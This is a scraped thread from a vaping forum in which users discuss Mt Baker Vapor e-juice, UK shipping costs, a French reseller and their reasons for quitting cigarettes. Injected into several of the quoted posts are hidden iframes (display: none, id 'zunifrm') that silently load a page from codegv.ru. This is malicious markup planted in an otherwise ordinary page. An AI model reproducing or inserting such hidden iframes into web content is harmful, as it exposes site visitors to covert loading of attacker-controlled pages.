What's new

MtBakerVapor.com Quality USA Made EJuice, Ships in 24 hours, Friendly CS

jamesthompson just been on mt baker site, i guess free shipping on over $50 order doesn't apply to uk customers.
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

@jamesthompson just been on mt baker site, i guess free shipping on over $50 order doesn't apply to uk customers.
<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Unfortunately that's for US only :( Shipping to Europe is expensive, it should say free shipping on US orders only on the website. Sorry about that :(

jamesthompson just been on mt baker site, i guess free shipping on over $50 order doesn't apply to uk customers.
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Try cloudhouse vapor it's in France does mbv juices and great deals and if you spend over 50 euros if free shipping worldwide but then again it's only about £2.50 postage if you don't spend that much!

Sent from my iPad using Planet of the Vapes

richard.whittle

I use cloudhousevapor but their mountbaker range is not as extensive as the US MBV site :drool:

<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

@richard.whittle

I use cloudhousevapor but their mountbaker range is not as extensive as the US MBV site :drool:

<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Cloudhousevapor is an awesome reseller, but our US site is a bit more extensive. We're always looking to gain more european resellers though, thats what the Abroad program is for!

We would like to know why you have switched from cigarettes to e-cigarettes? Getting to know other peoples inspirational stories reminds us what we are fighting for!

I had yellow fingers, yellow teeth, smelled rank and couldn't walk up all the hills to my house comfortably. Bought a cheap ego set up with no expectations and didn't smoke another stinkie from my first inhale

Sent from my GT-S6810P using Planet of the Vapes mobile app

Back
Top Bottom